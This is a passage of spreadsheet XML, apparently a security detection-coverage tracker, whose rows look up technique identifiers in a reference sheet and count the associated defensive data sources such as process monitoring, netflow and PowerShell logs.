        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D53" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E53" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="13"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="53" t="s">
        <v>103</v>
      </c>
      <c r="B54" s="13" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C54" s="17" t="s">
        <v>128</v>
      </c>
      <c r="D54" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E54" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F54" s="13"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="53" t="s">
        <v>784</v>
      </c>
      <c r="B55" s="13" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D55" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E55" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="13"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="55" t="s">
        <v>789</v>
      </c>
      <c r="B56" s="13" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D56" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E56" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F56" s="13"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="55" t="s">
        <v>794</v>
      </c>
      <c r="B57" s="13" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D57" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E57" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F57" s="13"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="55" t="s">
        <v>797</v>
      </c>
      <c r="B58" s="13" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D58" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E58" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="13"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="53" t="s">
        <v>801</v>
      </c>
      <c r="B59" s="13" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D59" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E59" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F59" s="13"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="53" t="s">
        <v>106</v>
      </c>
      <c r="B60" s="13" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D60" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E60" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F60" s="13"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="53" t="s">
        <v>108</v>
      </c>
      <c r="B61" s="13" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D61" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E61" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F61" s="13"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="53" t="s">
        <v>110</v>
      </c>
      <c r="B62" s="13" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C62" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D62" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="13"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="55" t="s">
        <v>113</v>
      </c>
      <c r="B63" s="13" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C63" s="17">
        <v>100</v>
      </c>
      <c r="D63" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E63" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="13"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="53" t="s">
        <v>117</v>
      </c>
      <c r="B64" s="13" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C64" s="17" t="s">
        <v>144</v>
      </c>
      <c r="D64" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E64" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F64" s="13"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="53" t="s">
        <v>118</v>
      </c>
      <c r="B65" s="13" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>146</v>
      </c>
      <c r="D65" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E65" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="13"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="53" t="s">
        <v>119</v>
      </c>
      <c r="B66" s="13" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D66" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E66" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F66" s="13"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="53" t="s">
        <v>831</v>
      </c>
      <c r="B67" s="13" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D67" s="13">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>5</v>
      </c>
      <c r="E67" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="13"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="53" t="s">
        <v>836</v>
      </c>
      <c r="B68" s="13" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>150</v>
      </c>
      <c r="D68" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E68" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F68" s="13"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="53" t="s">
        <v>841</v>
      </c>
      <c r="B69" s="13" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow,Packet capture,Process use of network</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D69" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E69" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F69" s="13"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="53" t="s">
        <v>121</v>
      </c>
      <c r="B70" s="13" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D70" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E70" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F70" s="13"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="53" t="s">
        <v>124</v>
      </c>
      <c r="B71" s="13" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D71" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E71" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F71" s="13"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="53" t="s">
        <v>125</v>
      </c>
      <c r="B72" s="13" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>156</v>
      </c>
      <c r="D72" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E72" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F72" s="13"/>
      <c r="G72" s="19"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="53" t="s">
        <v>855</v>
      </c>
      <c r="B73" s="13" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>158</v>
      </c>
      <c r="D73" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E73" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F73" s="13"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="53" t="s">
        <v>127</v>
      </c>
      <c r="B74" s="13" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D74" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E74" s="13">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F74" s="13"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="53" t="s">
        <v>863</v>
      </c>
      <c r="B75" s="13" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D75" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E75" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F75" s="13"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="55" t="s">
        <v>868</v>
      </c>
      <c r="B76" s="13" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</v>
      </c>
      <c r="C76" s="17">
        <v>100</v>
      </c>
      <c r="D76" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E76" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="13"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="53" t="s">
        <v>873</v>
      </c>
      <c r="B77" s="13" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D77" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E77" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F77" s="13"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="53" t="s">
        <v>877</v>
      </c>
      <c r="B78" s="13" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>164</v>
      </c>
      <c r="D78" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E78" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F78" s="13"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="53" t="s">
        <v>881</v>
      </c>
      <c r="B79" s="13" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D79" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E79" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F79" s="13"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="53" t="s">
        <v>885</v>
      </c>
      <c r="B80" s="13" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>168</v>
      </c>
      <c r="D80" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E80" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F80" s="13"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="53" t="s">
        <v>131</v>
      </c>
      <c r="B81" s="13" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D81" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E81" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F81" s="13"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="53" t="s">
        <v>895</v>
      </c>
      <c r="B82" s="13" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C82" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D82" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E82" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F82" s="13"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="53" t="s">
        <v>900</v>
      </c>
      <c r="B83" s="13" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D83" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E83" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="13"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="53" t="s">
        <v>906</v>
      </c>
      <c r="B84" s="13" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D84" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E84" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F84" s="13"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="55" t="s">
        <v>910</v>
      </c>
      <c r="B85" s="13" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C85" s="17">
        <v>100</v>
      </c>
      <c r="D85" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E85" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="13"/>
      <c r="G85" s="19"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="53" t="s">
        <v>914</v>
      </c>
      <c r="B86" s="13" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>175</v>
      </c>
      <c r="D86" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E86" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F86" s="13"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="53" t="s">
        <v>917</v>
      </c>
      <c r="B87" s="13" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>177</v>
      </c>
      <c r="D87" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E87" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F87" s="13"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="55" t="s">
        <v>922</v>
      </c>
      <c r="B88" s="13" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D88" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E88" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F88" s="13"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="53" t="s">
        <v>926</v>
      </c>
      <c r="B89" s="13" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>180</v>
      </c>
      <c r="D89" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E89" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F89" s="13"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="53" t="s">
        <v>930</v>
      </c>
      <c r="B90" s="13" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C90" s="17" t="s">
        <v>182</v>
      </c>
      <c r="D90" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E90" s="13">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F90" s="13"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="53" t="s">
        <v>933</v>
      </c>
      <c r="B91" s="13" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,API monitoring</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D91" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E91" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F91" s="13"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="53" t="s">
        <v>938</v>
      </c>
      <c r="B92" s="13" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring</v>
      </c>
      <c r="C92" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D92" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="13"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="53" t="s">
        <v>133</v>
      </c>
      <c r="B93" s="13" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D93" s="13">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E93" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F93" s="13"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="53" t="s">
        <v>947</v>
      </c>
      <c r="B94" s="13" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,API monitoring</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D94" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E94" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F94" s="13"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="53" t="s">
        <v>953</v>
      </c>
      <c r="B95" s="13" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,User interface,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C95" s="17" t="s">
        <v>189</v>
      </c>
      <c r="D95" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E95" s="13">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F95" s="13"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="55" t="s">
        <v>958</v>
      </c>
      <c r="B96" s="13" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C96" s="17">
        <v>100</v>
      </c>
      <c r="D96" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E96" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F96" s="13"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="53" t="s">
        <v>962</v>
      </c>
      <c r="B97" s="13" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process monitoring,Loaded DLLs,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C97" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D97" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E97" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F97" s="13"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="55" t="s">
        <v>135</v>
      </c>
      <c r="B98" s="13" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C98" s="17">
        <v>100</v>
      </c>
      <c r="D98" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E98" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="13"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="53" t="s">
        <v>138</v>
      </c>
      <c r="B99" s="13" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C99" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D99" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E99" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F99" s="13"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="53" t="s">
        <v>974</v>
      </c>
      <c r="B100" s="13" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process monitoring,Process command-line parameters,PowerShell logs,Loaded DLLs,File monitoring,DLL monitoring</v>
      </c>
      <c r="C100" s="17" t="s">
        <v>197</v>
      </c>
      <c r="D100" s="13">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E100" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F100" s="13"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="53" t="s">
        <v>979</v>
      </c>
      <c r="B101" s="13" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C101" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D101" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E101" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F101" s="13"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="53" t="s">
        <v>983</v>
      </c>
      <c r="B102" s="13" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C102" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D102" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F102" s="13"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="53" t="s">
        <v>988</v>
      </c>
      <c r="B103" s="13" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C103" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D103" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
